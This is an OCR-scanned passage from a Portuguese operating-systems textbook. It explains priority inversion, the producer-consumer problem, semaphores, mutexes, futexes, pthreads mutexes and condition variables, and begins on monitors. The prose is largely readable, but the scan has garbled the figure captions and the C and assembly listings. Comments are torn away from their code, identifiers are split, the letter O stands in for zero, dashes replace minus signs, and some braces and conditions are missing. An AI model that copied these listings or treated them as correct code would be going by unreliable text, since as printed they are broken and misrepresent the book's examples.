calonamento são colocadas de tal forma que H é execu- 
tado sempre que ele estiver em um estado pronto. Em 
um determinado momento, com L em sua região crítica, 
H'torna-se pronto para executar (por exemplo, completa 
uma operação de E/S). H agora começa a espera ocupa- 
da, mas tendo em vista que £ nunca é escalonado en- 
quanto H estiver executando, L jamais recebe a chance 
de deixar a sua região crítica, de maneira que H segue 
em um laço infinito. Essa situação às vezes é referida 
como problema da inversão de prioridade. 

Agora vamos examinar algumas primitivas de co- 
municação entre processos que bloqueiam em vez de 
desperdiçar tempo da CPU quando eles não são autori- 
zados a entrar nas suas regiões críticas. Uma das mais 
simples é o par sleep e wakeup. Sleep é uma chamada 
de sistema que faz com que o processo que a chamou 
bloqueie, isto é, seja suspenso até que outro processo 
o desperte. A chamada wakeup tem um parâmetro, o 
processo a ser desperto. Alternativamente, tanto sleep 
quanto wakeup cada um tem um parâmetro, um endere- 
ço de memória usado para parear sleeps com wakeups. 


O problema do produtor-consumidor 


Como um exemplo de como essas primitivas podem 
ser usadas, vamos considerar o problema produtor-con- 
sumidor (também conhecido como problema do buffer 
limitado). Dois processos compartilham de um buffer 
de tamanho fixo comum. Um deles, o produtor, insere 
informações no buffer, e o outro, o consumidor, as retira 
dele. (Também é possível generalizar o problema para 
ter m produtores e n consumidores, mas consideraremos 
apenas o caso de um produtor e um consumidor, porque 
esse pressuposto simplifica as soluções). 

O problema surge quando o produtor quer colocar 
um item novo no buffer, mas ele já está cheio. A solução 
é o produtor ir dormir, para ser desperto quando o con- 
sumidor tiver removido um ou mais itens. De modo si- 
milar, se o consumidor quer remover um item do buffer 
e vê que este está vazio, ele vai dormir até o produtor 
colocar algo no buffer e despertá-lo. 

Essa abordagem soa suficientemente simples, mas 
leva aos mesmos tipos de condições de corrida que vimos 


anteriormente com o diretório de spool. Para controlar o 
número de itens no buffer, precisaremos de uma variável, 
count. Se o número máximo de itens que o buffer pode 
conter é N, o código do produtor primeiro testará para ver 
se count é N. Se ele for, o produtor vai dormir; se não for, 
o produtor acrescentará um item e incrementará count. 

O código do consumidor é similar: primeiro testar 
count para ver se ele é 0. Se for, vai dormir; se não for, 
remove um item e decresce o contador. Cada um dos 
processos também testa para ver se o outro deve ser des- 
perto e, se assim for, despertá-lo. O código para ambos, 
produtor e consumidor, é mostrado na Figura 2.27. 

Para expressar chamadas de sistema como sleep e 
wakeup em C, nós as mostraremos como chamadas para 
rotinas de biblioteca. Elas não fazem parte da biblioteca 
C padrão, mas presumivelmente estariam disponíveis 
em qualquer sistema que de fato tivesse essas chamadas 
de sistema. As rotinas insert item e remove item, que 
não são mostradas, lidam com o controle da inserção e 
retirada de itens do buffer. 

Agora voltemos às condições da corrida. Elas podem 
ocorrer porque o acesso a count não é restrito. Como 
consequência, a situação a seguir poderia eventualmen- 
te ocorrer. O buffer está vazio e o consumidor acabou de 
ler count para ver se é 0. Nesse instante, o escalonador 
decide parar de executar o consumidor temporariamente 
e começar a executar o produtor. O produtor insere um 
item no buffer, incrementa count e nota que ele agora 
está em 1. Ponderando que count era apenas 0, e assim 
o consumidor deve estar dormindo, o produtor chama 
wakeup para despertar o consumidor. 

Infelizmente, o consumidor ainda não está logica- 
mente dormindo, então o sinal de despertar é perdido. 
Quando o consumidor executa em seguida, ele testará o 
valor de count que ele leu antes, descobrirá que ele é O e 
irá dormir. Cedo ou tarde o produtor preencherá o buffer 
e vai dormir também. Ambos dormirão para sempre. 

A essência do problema aqui é que um chamado de 
despertar enviado para um processo que (ainda) não 
está dormindo é perdido. Se não fosse perdido, tudo o 
mais funcionaria. Uma solução rápida é modificar as re- 
gras para acrescentar ao quadro um bit de espera pelo 
sinal de acordar. Quando um sinal de despertar é en- 
viado para um processo que ainda está desperto, esse bit 
é configurado. Depois, quando o processo tentar ador- 
mecer, se o bit de espera pelo sinal de acordar estiver 
ligado, ele será desligado, mas o processo permanecerá 
desperto. O bit de espera pelo sinal de acordar é um 
cofrinho para armazenar sinais de despertar. O consu- 
midor limpa o bit de espera pelo sinal de acordar em 
toda iteração do laço. 
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[eU ITA O problema do produtor-consumidor com uma condição de corrida fatal. 


#define N 100 
int count = 0; 


void producer(void) 


{ 
int item; 
while (TRUE) { 
item = produce. item(); 
if (count == N) sleep(); 
insert. item(item); 
count = count + 1; 
if (count == 1) wakeup(consumer); 
} 
} 
void consumer(void) 
{ 
int item; 
while (TRUE) { 
if (count == 0) sleep(); 
item = remove _item( ); 
count = count — 1; 
if (count == N — 1) wakeup(producer); 
consume_item(item); 
} 
} 


Embora o bit de espera pelo sinal de acordar salve a 
situação nesse exemplo simples, é fácil construir exem- 
plos com três ou mais processos nos quais o bit de espe- 
ra pelo sinal de acordar é insuficiente. Poderíamos fazer 
outra simulação e acrescentar um segundo bit de espera 
pelo sinal de acordar, ou talvez 8 ou 32 deles, mas em 
princípio o problema ainda está ali. 


2.3.5 Semáforos 


Essa era a situação em 1965, quando E. W. Dijkstra 
(1965) sugeriu usar uma variável inteira para contar o 
número de sinais de acordar salvos para uso futuro. Em 
sua proposta, um novo tipo de variável, que ele chama- 
va de semáforo, foi introduzido. Um semáforo podia ter 
o valor 0, indicando que nenhum sinal de despertar fora 
salvo, ou algum valor positivo se um ou mais sinais de 
acordar estivessem pendentes. 


/* numero de lugares no buffer */ 
/* numero de itens no buffer */ 


/* repita para sempre */ 

/* gera o proximo item */ 

/* se o buffer estiver cheio, va dormir */ 

/* ponha um item no buffer */ 

/* incremente o contador de itens no buffer */ 
/* O buffer estava vazio? */ 


/* repita para sempre */ 

/* se o buffer estiver cheio, va dormir */ 

/* retire o item do buffer */ 

/* descresca de um contador de itens no buffer */ 
/* o buffer estava cheio? */ 

/* imprima o item */ 


Dijkstra propôs ter duas operações nos semáforos, hoje 
normalmente chamadas de down e up (generalizações de 
sleep e wakeup, respectivamente). A operação down em 
um semáforo confere para ver se o valor é maior do que 0. 
Se for, ele decrementará o valor (isto é, gasta um sinal de 
acordar armazenado) e apenas continua. Se o valor for 0, 
o processo é colocado para dormir sem completar o down 
para o momento. Conferir o valor, modificá-lo e possivel- 
mente dormir são feitos como uma única ação atômica 
indivisível. É garantido que uma vez que a operação de 
semáforo tenha começado, nenhum outro processo pode 
acessar o semáforo até que a operação tenha sido conclui- 
da ou bloqueada. Essa atomicidade é absolutamente essen- 
cial para solucionar problemas de sincronização e evitar 
condições de corrida. Ações atômicas, nas quais um grupo 
de operações relacionadas são todas realizadas sem inter- 
rupção ou não são executadas em absoluto, são extrema- 
mente importantes em muitas outras áreas da ciência de 
computação também. 
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A operação up incrementa o valor de um determinado 
semáforo. Se um ou mais processos estiverem dormin- 
do naquele semáforo, incapaz de completar uma ope- 
ração down anterior, um deles é escolhido pelo sistema 
(por exemplo, ao acaso) e é autorizado a completar seu 
down. Desse modo, após um up com processos dormin- 
do em um semáforo, ele ainda estará em 0, mas haverá 
menos processos dormindo nele. A operação de incre- 
mentar o semáforo e despertar um processo também é 
indivisível. Nenhum processo é bloqueado realizando 
um up, assim como nenhum processo é bloqueado rea- 
lizando um wakeup no modelo anterior. 

Como uma nota, no estudo original de Dijkstra, ele 
usou os nomes P e V em vez de down e up, respec- 
tivamente. Como essas letras não têm significância 


mnemônica para pessoas que não falam holandês e 
apenas marginal para aquelas que o falam — Probe- 
ren (tentar) e Verhogen (levantar, erguer) — usaremos 
os termos down e up em vez disso. Esses mecanismos 
foram introduzidos pela primeira vez na linguagem de 
programação Algol 68. 


Solucionando o problema produtor-consumidor 
usando semáforos 


Semáforos solucionam o problema do sinal de acor- 
dar perdido, como mostrado na Figura 2.28. Para fazê- 
-los funcionar corretamente, é essencial que eles sejam 
implementados de uma maneira indivisível. A maneira 


Jeli: O problema do produtor-consumidor usando semáforos. 


define N 100 

typedef int semaphore; 
semaphore mutex = 1; 
semaphore empty = N; 
semaphore full = O; 


void producer(void) 


{ 


int item; 


while (TRUE) { 
item = produce item(); 
down(&empty); 
down(&mutex); 
insert_item(item); 
up(&mutex); 
up(&full); 


void consumer(void) 


{ 


int item; 


while (TRUE) { 
down(&full); 
down(&mutex); 
item = remove item(); 
up(&mutex); 
up(&empty); 
consume_item(item); 


/* numero de lugares no buffer */ 

/* semaforos sao um tipo especial de int */ 
/* controla o acesso a regiao critica */ 

/* conta os lugares vazios no buffer */ 

/* conta os lugares preenchidos no buffer */ 


/* TRUE e a constante 1 */ 

/* gera algo para por no buffer */ 

/* decresce o contador empty */ 

/* entra na regiao critica */ 

/* poe novo item no buffer */ 

/* sai da regiao critica */ 

/* incrementa o contador de lugares preenchidos */ 


/* laco infinito */ 

/* decresce o contador full */ 

/* entra na regiao critica */ 

/* pega item do buffer */ 

/* sai da regiao critica */ 

/* incrementa o contador de lugares vazios */ 
/* faz algo com o item */ 


normal é implementar up e down como chamadas de 
sistema, com o sistema operacional desabilitando bre- 
vemente todas as interrupções enquanto ele estiver tes- 
tando o semáforo, atualizando-o e colocando o processo 
para dormir, se necessário. Como todas essas ações exi- 
gem apenas algumas instruções, nenhum dano resulta 
ao desabilitar as interrupções. Se múltiplas CPUs esti- 
verem sendo usadas, cada semáforo deverá ser protegi- 
do por uma variável de trava, com as instruções TSL ou 
XCHG usadas para certificar-se de que apenas uma CPU 
de cada vez examina o semáforo. 

Certifique-se de que você compreendeu que usar 
TSL ou XCHG para evitar que várias CPUs acessem 
o semáforo ao mesmo tempo é bastante diferente do 
produtor ou consumidor em espera ocupada para que 
o outro esvazie ou encha o buffer. A operação de semá- 
foro levará apenas alguns microssegundos, enquanto o 
produtor ou o consumidor podem levar tempos arbitra- 
riamente longos. 

Essa solução usa três semáforos: um chamado full 
para contar o número de vagas que estão cheias, outro 
chamado empty para contar o número de vagas que es- 
tão vazias e mais um chamado mutex para se certificar 
de que o produtor e o consumidor não acessem o buffer 
ao mesmo tempo. Inicialmente, full é 0, empty é igual 
ao número de vagas no buffer e mutex é 1. Semáforos 
que são inicializados para 1 e usados por dois ou mais 
processos para assegurar que apenas um deles consiga 
entrar em sua região crítica de cada vez são chamados 
de semáforos binários. Se cada processo realiza um 
down um pouco antes de entrar em sua região crítica 
e um up logo depois de deixá-la, a exclusão mútua é 
garantida. 

Agora que temos uma boa primitiva de comunicação 
entre processos à disposição, vamos voltar e examinar 
a sequência de interrupção da Figura 2.5 novamente. 
Em um sistema usando semáforos, a maneira natural de 
esconder interrupções é ter um semáforo inicialmente 
configurado para 0, associado com cada dispositivo de 
E/S. Logo após inicializar um dispositivo de E/S, o pro- 
cesso de gerenciamento realiza um down no semáforo 
associado, desse modo bloqueando-o imediatamente. 
Quando a interrupção chega, o tratamento de interrup- 
ção então realiza um up nesse modelo, o que deixa o 
processo relevante pronto para executar de novo. Nesse 
modelo, o passo 5 na Figura 2.5 consiste em realizar 
um up no semáforo do dispositivo, assim no passo 6 
o escalonador será capaz de executar o gerenciador do 
dispositivo. É claro que se vários processos estão agora 
prontos, o escalonador pode escolher executar um pro- 
cesso mais importante ainda em seguida. Examinaremos 
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alguns dos algoritmos usados para escalonamento mais 
tarde neste capítulo. 

No exemplo da Figura 2.28, na realidade, usamos 
semáforos de duas maneiras diferentes. Essa diferença 
é importante o suficiente para ser destacada. O semáfo- 
ro mutex é usado para exclusão mútua. Ele é projetado 
para garantir que apenas um processo de cada vez este- 
ja lendo ou escrevendo no buffer e em variáveis asso- 
ciadas. Essa exclusão mútua é necessária para evitar o 
caos. Na próxima seção, estudaremos a exclusão mútua 
e como consegui-la. 

O outro uso dos semáforos é para a sincronização. 
Os semáforos full e empty são necessários para garan- 
tir que determinadas sequências ocorram ou não. Nesse 
caso, eles asseguram que o produtor pare de executar 
quando o buffer estiver cheio, e que o consumidor pare 
de executar quando ele estiver vazio. Esse uso é diferen- 
te da exclusão mútua. 


2.3.6 Mutexes 


Quando a capacidade do semáforo de fazer conta- 
gem não é necessária, uma versão simplificada, chama- 
da mutex, às vezes é usada. Mutexes são bons somente 
para gerenciar a exclusão mútua de algum recurso ou 
trecho de código compartilhados. Eles são fáceis e efi- 
cientes de implementar, o que os torna especialmente 
úteis em pacotes de threads que são implementados in- 
teiramente no espaço do usuário. 

Um mutex é uma variável compartilhada que pode 
estar em um de dois estados: destravado ou travado. Em 
consequência, apenas 1 bit é necessário para representá- 
-lo, mas na prática muitas vezes um inteiro é usado, com 
O significando destravado e todos os outros valores sig- 
nificando travado. Duas rotinas são usadas com mute- 
xes. Quando um thread (ou processo) precisa de acesso 
a uma região crítica, ele chama mutex lock. Se o mutex 
estiver destravado naquele momento (significando que 
a região crítica está disponível), a chamada seguirá e 
o thread que chamou estará livre para entrar na região 
crítica. 

Por outro lado, se o mutex já estiver travado, o thread 
que chamou será bloqueado até que o thread na região 
crítica tenha concluído e chame mutex unlock. Se múl- 
tiplos threads estiverem bloqueados no mutex, um deles 
será escolhido ao acaso e liberado para adquirir a trava. 

Como mutexes são muito simples, eles podem ser 
facilmente implementados no espaço do usuário, des- 
de que uma instrução TSL ou XCHG esteja disponível. 
O código para mutex lock e mutex unlock para uso 
com um pacote de threads de usuário são mostrados na 


[92 | | SISTEMAS OPERACIONAIS MODERNOS 


Figura 2.29. A solução com XCHG é essencialmente a 
mesma. 

O código de mutex lock é similar ao código de 
enter region da Figura 2.25, mas com uma diferença 
crucial: quando enter region falha em entrar na região 
crítica, ele segue testando a trava repetidamente (espe- 
ra ocupada); por fim, o tempo de CPU termina e outro 
processo é escalonado para executar. Cedo ou tarde, o 
processo que detém a trava é executado e a libera. 

Com threads (de usuário) a situação é diferente, pois 
não há um relógio que pare threads que tenham sido 
executados por tempo demais. Em consequência, um 
thread que tenta adquirir uma trava através da espera 
ocupada, ficará em um laço para sempre e nunca adqui- 
rirá a trava, pois ela jamais permitirá que outro thread 
execute e a libere. 

É aí que entra a diferença entre enter region e mu- 
tex lock. Quando o segundo falha em adquirir uma tra- 
va, ele chama thread yield para abrir mão da CPU para 
outro thread. Em consequência, não há espera ocupada. 
Quando o thread executa da vez seguinte, ele testa a 
trava novamente. 

Tendo em vista que thread yield é apenas uma 
chamada para o escalonador de threads no espaço de 
usuário, ela é muito rápida. Em consequência, nem mu- 
tex lock, tampouco mutex unlock exigem quaisquer 
chamadas de núcleo. Usando-os, threads de usuário 
podem sincronizar inteiramente no espaço do usuá- 
rio usando rotinas que exigem apenas um punhado de 
instruções. 

O sistema mutex que descrevemos é um conjun- 
to mínimo de chamadas. Com todos os softwares há 
sempre uma demanda por mais inovações e as primi- 
tivas de sincronização não são exceção. Por exemplo, 
às vezes um pacote de thread oferece uma chamada 
mutex trylock que adquire a trava ou retorna um código 


[FIGURA 2.29] Implementação de mutex_lock e mutex_unlock. 


mutex. lock: 
TSL REGISTER,MUTEX 
CMP REGISTER,#0 
JZE ok 
CALL thread yield 
JMP mutex. lock 

ok: RET 


mutex. unlock: 
MOVE MUTEX,#0 
RET 


de falha, mas sem bloquear. Essa chamada da ao thread 
a flexibilidade para decidir o que fazer em seguida, se 
houver alternativas para apenas esperar. 

Há uma questão sutil que até agora tratamos superfi- 
cialmente, mas que vale a pena ser destacada: com um 
pacote de threads de espaço de usuário não há um proble- 
ma com múltiplos threads terem acesso ao mesmo mutex, 
ja que todos os threads operam em um espaço de endere- 
camento comum; no entanto, com todas as soluções an- 
teriores, como o algoritmo de Peterson e os semáforos, 
há uma suposição velada de que os múltiplos processos 
têm acesso a pelo menos alguma memória compartilha- 
da, talvez apenas uma palavra, mas têm acesso a algo. 
Se os processos têm espaços de endereçamento disjun- 
tos, como dissemos consistentemente, como eles podem 
compartilhar a variável turn no algoritmo de Peterson, ou 
semáforos, ou um buffer comum? 

Há duas respostas: primeiro, algumas das estruturas 
de dados compartilhadas, como os semáforos, podem 
ser armazenadas no núcleo e acessadas somente por 
chamadas de sistema — essa abordagem elimina o pro- 
blema; segundo, a maioria dos sistemas operacionais 
modernos (incluindo UNIX e Windows) oferece uma 
maneira para os processos compartilharem alguma por- 
ção do seu espaço de endereçamento com outros. Dessa 
maneira, buffers e outras estruturas de dados podem ser 
compartilhados. No pior caso, em que nada mais é pos- 
sível, um arquivo compartilhado pode ser usado. 

Se dois ou mais processos compartilham a maior 
parte ou todo o seu espaço de endereçamento, a dis- 
tinção entre processos e threads torna-se confusa, mas 
segue de certa forma presente. Dois processos que com- 
partilham um espaço de endereçamento comum ainda 
têm arquivos abertos diferentes, temporizadores de 
alarme e outras propriedades por processo, enquanto os 
threads dentro de um único processo os compartilham. 


| copia mutex para o registrador e atribui a ele o valor 1 

| o mutex era zero? 

| se era zero, o mutex estava desimpedido, portanto retorne 
| o mutex esta ocupado; escalone um outro thread 

| tente novamente 


| retorna a quem chamou; entrou na regiao critica 


| coloca O em mutex 
| retorna a quem chamou 


E é sempre verdade que múltiplos processos comparti- 
lhando um espaço de endereçamento comum nunca têm 
a eficiência de threads de usuário, já que o núcleo está 
profundamente envolvido em seu gerenciamento. 


Futexes 


Com o paralelismo cada vez maior, a sincronização 
eficiente e o travamento são muito importantes para o 
desempenho. Travas giratórias são rápidas se a espera 
for curta, mas desperdiçam ciclos de CPU se não for o 
caso. Se houver muita contenção, logo é mais eficien- 
te bloquear o processo e deixar o núcleo desbloqueá-lo 
apenas quando a trava estiver liberada. Infelizmente, 
isso tem o problema inverso: funciona bem sob uma 
contenção pesada, mas trocar continuamente para o nú- 
cleo fica caro se houver pouca contenção. Para piorar 
a situação, talvez não seja fácil prever o montante de 
contenção pela trava. 

Uma solução interessante que tenta combinar o me- 
lhor dos dois mundos é conhecida como futex (ou fast 
userspace mutex — mutex rápido de espaço usuário). 
Um futex é uma inovação do Linux que implementa 
travamento básico (de maneira muito semelhante com 
mutex), mas evita adentrar o núcleo, a não ser que ele 
realmente tenha de fazê-lo. Tendo em vista que chave- 
ar para o núcleo e voltar é algo bastante caro, fazer isso 
melhora o desempenho consideravelmente. Um futex 
consiste em duas partes: um serviço de núcleo e uma 
biblioteca de usuário. O serviço de núcleo fornece uma 
“fila de espera” que permite que múltiplos processos 
esperem em uma trava. Eles não executarão, a não ser 
que o núcleo explicitamente os desbloqueie. Para um 
processo ser colocado na fila de espera é necessária 
uma chamada de sistema (cara) e deve ser evitado. 
Na ausência da contenção, portanto, o futex funciona 
completamente no espaço do usuário. Especificamen- 
te, os processos compartilham uma variável de trava 
comum — um nome bacana para um número inteiro 
de 32 bits alinhados que serve como trava. Suponha 
que a trava seja de inicio 1 — que consideramos que 
signifique a trava estar livre. Um thread pega a trava 
realizando um “decremento e teste” atômico (funções 
atômicas no Linux consistem de código de montagem 
em linha revestido por funções C e são definidas em 
arquivos de cabeçalho). Em seguida, o thread inspe- 
ciona o resultado para ver se a trava está ou não libera- 
da. Se ela não estiver no estado travado, tudo vai bem 
e o nosso thread foi bem-sucedido em pegar a trava. 
No entanto, se ela estiver nas mãos de outro thread, 
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o nosso tem de esperar. Nesse caso, a biblioteca futex 
não utiliza a trava giratória, mas usa uma chamada de 
sistema para colocar o thread na fila de espera no nú- 
cleo. Esperamos que o custo da troca para o núcleo 
seja agora justificado, porque o thread foi bloqueado 
de qualquer maneira. Quando um thread tiver termi- 
nado com a trava, ele a libera com um “incremento 
e teste” atômico e confere o resultado para ver se al- 
gum processo ainda está bloqueado na fila de espera 
do núcleo. Se isso ocorrer, ele avisará o núcleo que 
ele pode desbloquear um ou mais desses processos. Se 
não houver contenção, o núcleo não estará envolvido 
de maneira alguma. 


Mutexes em pthreads 


Pthreads proporcionam uma série de funções que po- 
dem ser usadas para sincronizar threads. O mecanismo 
básico usa uma variável mutex, que pode ser travada ou 
destravada, para guardar cada região crítica. Um thread 
desejando entrar em uma região crítica tenta primeiro 
travar o mutex associado. Se o mutex estiver destravado, 
o thread pode entrar imediatamente e a trava é atomica- 
mente configurada, evitando que outros threads entrem. 
Se o mutex já estiver travado, o thread que chamou é 
bloqueado até ser desbloqueado. Se múltiplos threads 
estão esperando no mesmo mutex, quando ele está des- 
travado, apenas um deles é autorizado a continuar e 
travá-lo novamente. Essas travas não são obrigatórias. 
Cabe ao programador assegurar que os threads as usem 
corretamente. 

As principais chamadas relacionadas com os mu- 
texes estão mostradas na Figura 2.30. Como esperado, 
mutexes podem ser criados e destruídos. As chamadas 
para realizar essas operações são pthread mutex init e 
pthread mutex destroy, respectivamente. Eles também 
podem ser travados — por pthread mutex lock — que 
tenta adquirir a trava e é bloqueado se o mutex já es- 
tiver travado. Há também uma opção de tentar travar 
um mutex e falhar com um código de erro em vez de 
bloqueá-lo, se ele já estiver bloqueado. Essa chamada 
é pthread mutex trylock. Ela permite que um thread de 
fato realize a espera ocupada, se isso for em algum mo- 
mento necessário. Finalmente, pthread mutex unlock 
destrava um mutex e libera exatamente um thread, se 
um ou mais estiver esperando por ele. Mutexes também 
podem ter atributos, mas esses são usados somente para 
fins especializados. 
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eN TEEN Algumas chamadas de Pthreads relacionadas a 
mutexes. 





Chamada de thread Descrição 





Pthread mutex init Cria um mutex 





Pthread mutex destroy Destrói um mutex existente 





Pthread mutex lock Obtém uma trava ou é bloqueado 





Pthread mutex trylock Obtém uma trava ou falha 





Pthread mutex unlock Libera uma trava 











Além dos mutexes, pthreads oferecem um segundo 
mecanismo de sincronização: variáveis de condição. Mu- 
texes são bons para permitir ou bloquear acesso à região 
crítica. Variáveis de condição permitem que threads sejam 
bloqueados devido a alguma condição não estar sendo 
atendida. Quase sempre os dois métodos são usados jun- 
tos. Vamos agora examinar a interação de threads, mutexes 
e variáveis de condição um pouco mais detalhadamente. 

Como um exemplo simples, considere o cenário pro- 
dutor-consumidor novamente: um thread coloca as coi- 
sas em um buffer e outro as tira. Se o produtor descobre 
que não há mais posições livres disponíveis no buffer, 
ele tem de ser bloqueado até uma se tornar disponível. 
Mutexes tornam possível realizar a conferência atomi- 
camente sem interferência de outros threads, mas tendo 
descoberto que o buffer está cheio, o produtor precisa 
de uma maneira para bloquear e ser despertado mais tar- 
de. É isso que as variáveis de condição permitem. 

As chamadas mais importantes relacionadas com as 
variáveis de condição são mostradas na Figura 2.31. 
Como você provavelmente esperaria, há chamadas 
para criar e destruir as variáveis de condição. Elas 
podem ter atributos e há várias chamadas para geren- 
ciá-las (não mostradas). As operações principais das 
variáveis de condição são pthread cond wait e pthre- 
ad cond signal. O primeiro bloqueia o thread que 
chamou até que algum outro thread sinalize (usando 
a última chamada). As razões para bloquear e esperar 
não são parte do protocolo de espera e sinalização, é 
claro. O thread que é bloqueado muitas vezes está es- 
perando pelo que sinaliza para realizar algum trabalho, 
liberar algum recurso ou desempenhar alguma outra 
atividade. Apenas então o thread que bloqueia conti- 
nua. As variáveis de condição permitem que essa es- 
pera e bloqueio sejam feitos atomicamente. A chamada 
pthread cond broadcast é usada quando há múltiplos 
threads todos potencialmente bloqueados e esperando 
pelo mesmo sinal. 


Kel T PÆ Algumas das chamadas de Pthreads relacionadas 
com variáveis de condição. 





Chamada de thread Descrição 





Pthread cond init Cria uma variável de condição 





Pthread cond destroy Destrói uma variável de condição 





Pthread cond wait É bloqueado esperando por um sinal 


Pthread cond signal Sinaliza para outro thread e o 


desperta 





Pthread cond broadcast | Sinaliza para múltiplos threads e 


desperta todos eles 














Variáveis de condição e mutexes são sempre usados 
juntos. O padrão é um thread travar um mutex e, en- 
tão, esperar em uma variável condicional quando ele 
não consegue o que precisa. Por fim, outro thread vai 
sinalizá-lo, e ele pode continuar. A chamada pthread | 
cond wait destrava atomicamente o mutex que o está 
segurando. Por essa razão, o mutex é um dos parâmetros. 

Também vale a pena observar que variáveis de con- 
dição (diferentemente de semáforos) não têm memória. 
Se um sinal é enviado sobre o qual não há um thread 
esperando, o sinal é perdido. Programadores têm de ser 
cuidadosos para não perder sinais. 

Como um exemplo de como mutexes e variáveis de 
condição são usados, a Figura 2.32 mostra um proble- 
ma produtor-consumidor muito simples com um único 
buffer. Quando o produtor preencher o buffer, ele deve 
esperar até que o consumidor o esvazie antes de produzir 
o próximo item. Similarmente, quando o consumidor re- 
mover um item, ele deve esperar até que o produtor tenha 
produzido outro. Embora muito simples, esse exemplo 
ilustra mecanismos básicos. O comando que coloca um 
thread para dormir deve sempre checar a condição para 
se certificar de que ela seja satisfeita antes de continuar, 
visto que o thread poderia ter sido despertado por causa 
de um sinal UNIX ou alguma outra razão. 


2.3.7 Monitores 


Com semáforos e mutexes a comunicação entre pro- 
cessos parece fácil, certo? Errado. Observe de perto a or- 
dem dos downs antes de inserir ou remover itens do buffer 
na Figura 2.28. Suponha que os dois downs no código do 
produtor fossem invertidos, de maneira que mutex tenha 
sido decrescido antes de empty em vez de depois dele. Se o 
buffer estivesse completamente cheio, o produtor seria blo- 
queado, com mutex configurado para 0. Em consequência, 
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(FIGURA 2.32] Usando threads para solucionar o problema produtor-consumidor. 


#include <stdio.h> 
#include <pthread.h> 


#define MAX 1000000000 
pthread_mutex_t the_mutex; 
pthread_cond_t condc, condp; 


int buffer = 0; 
void *producer(void *ptr) 
{ int i; 


for (i= 1; i <= MAX; i++) { 


pthread_mutex_lock(&the_mutex); 


/* quantos numeros produzir */ 


/* usado para sinalizacao */ 
/* buffer usado entre produtor e consumidor */ 


/* dados do produtor */ 


/* obtem acesso exclusivo ao buffer */ 


while (buffer != 0) pthread_cond_wait(&condp, &the_mutex); 


buffer = i; 
pthread. cond. signal(&condc); 


/*coloca item no buffer */ 
/* acorda consumidor */ 


pthread_mutex_unlock(&the __mutex);/* libera acesso ao buffer */ 


} 
pthread _exit(0); 
} 


void *consumer(void *ptr) 
{ int i; 
for (i = 1; i <= MAX; i++) { 


pthread_mutex_lock(&the_mutex); 


while (buffer == 
buffer = 0; 
pthread_cond_signal(&condp); 


/* dados do consumidor */ 


/* obtem acesso exclusivo ao buffer */ 
) pthread_cond_wait(&condc, &the_mutex); 

/* retira o item do buffer */ 

/* acorda o produtor */ 


pthread_mutex_unlock(&the __mutex);/* libera acesso ao buffer */ 


} 
pthread _exit(0); 
} 


int main(int argc, char **argv) 

{ 
pthread_t pro, con; 
pthread mutex. init(&the _mutex, 0); 
pthread. cond. init(&condc, 0); 
pthread. cond. init(&condp, 0); 
pthread_create(&con, 0, consumer, 0); 
pthread_create(&pro, 0, producer, 0); 
pthread _join(pro, 0); 
pthread _join(con, 0); 
pthread cond. destroy(&condc); 
pthread cond. destroy(&condp); 
pthread mutex. destroy(&the  mutex); 


da próxima vez que o consumidor tentasse acessar o 
buffer, ele faria um down em mutex, agora 0, e seria blo- 
queado também. Ambos os processos ficariam bloqueados 


para sempre e nenhum trabalho seria mais realizado. Essa 
situação infeliz é chamada de impasse (deadlock). Estuda- 
remos impasses detalhadamente no Capitulo 6. 
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Esse problema é destacado para mostrar o quão cui- 
dadoso você precisa ser quando usa semáforos. Um erro 
sutil e tudo para completamente. É como programar em 
linguagem de montagem, mas pior, pois os erros são 
condições de corrida, impasses e outras formas de com- 
portamento imprevisível e irreproduzível. 

Para facilitar a escrita de programas corretos, Brinch 
Hansen (1973) e Hoare (1974) propuseram uma pri- 
mitiva de sincronização de nível mais alto chamada 
monitor. Suas propostas diferiam ligeiramente, como 
descrito mais adiante. Um monitor é uma coleção de 
rotinas, variáveis e estruturas de dados que são reunidas 
em um tipo especial de módulo ou pacote. Processos 
podem chamar as rotinas em um monitor sempre que 
eles quiserem, mas eles não podem acessar diretamente 
as estruturas de dados internos do monitor a partir de 
rotinas declaradas fora dele. A Figura 2.33 ilustra um 
monitor escrito em uma linguagem imaginária, Pidgin 
Pascal. C não pode ser usado aqui, porque os monitores 
são um conceito de linguagem e C não os tem. 

Os monitores têm uma propriedade importante que 
os torna úteis para realizar a exclusão mútua: apenas um 
processo pode estar ativo em um monitor em qualquer 
dado instante. Monitores são uma construção da lingua- 
gem de programação, então o compilador sabe que eles 
são especiais e podem lidar com chamadas para rotinas 
de monitor diferentemente de outras chamadas de roti- 
na. Tipicamente, quando um processo chama uma roti- 
na do monitor, as primeiras instruções conferirão para 
ver se qualquer outro processo está ativo no momento 
dentro do monitor. Se isso ocorrer, o processo que cha- 
mou será suspenso até que o outro processo tenha dei- 
xado o monitor. Se nenhum outro processo está usando 
o monitor, o processo que chamou pode entrar. 


CEED Um monitor 


monitor example 
integer /; 
condition c; 


procedure producer (); 
end; 
procedure consumer ( ); 


end; 
end monitor; 


Cabe ao compilador implementar a exclusão mútua 
nas entradas do monitor, mas uma maneira comum é 
usar um mutex ou um semáforo binário. Como o com- 
pilador, não o programador, está arranjando a exclusão 
mútua, é muito menos provável que algo dê errado. 
De qualquer maneira, a pessoa escrevendo o monitor 
não precisa ter ciência de como o compilador arranja 
a exclusão mútua. Basta saber que ao transformar to- 
das as regiões críticas em rotinas de monitores, dois 
processos jamais executarão suas regiões críticas ao 
mesmo tempo. 

Embora os monitores proporcionem uma maneira 
fácil de alcançar a exclusão mútua, como vimos an- 
teriormente, isso não é suficiente. Também precisa- 
mos de uma maneira para os processos bloquearem 
quando não puderem prosseguir. No problema do 
produtor-consumidor, é bastante fácil colocar todos 
os testes de buffer cheio e buffer vazio nas rotinas de 
monitor, mas como o produtor seria bloqueado quan- 
do encontrasse o buffer cheio? 

A solução encontra-se na introdução de variáveis 
de condição, junto com duas operações, wait e signal. 
Quando uma rotina de monitor descobre que não pode 
continuar (por exemplo, o produtor encontra o buffer 
cheio), ela realiza um wait em alguma variável de con- 
dição, digamos, full. Essa ação provoca o bloqueio do 
processo que está chamando. Ele também permite ou- 
tro processo que tenha sido previamente proibido de 
entrar no monitor a entrar agora. Vimos variáveis de 
condição e essas operações no contexto de Pthreads 
anteriormente. 

Nesse outro processo, o consumidor, por exemplo, 
pode despertar o parceiro adormecido realizando um 
signal na variável de condição que seu parceiro está es- 
perando. Para evitar ter dois processos ativos no monitor 
ao mesmo tempo, precisamos de uma regra dizendo o 
que acontece depois de um signal. Hoare propôs deixar 
o processo recentemente desperto executar, suspenden- 
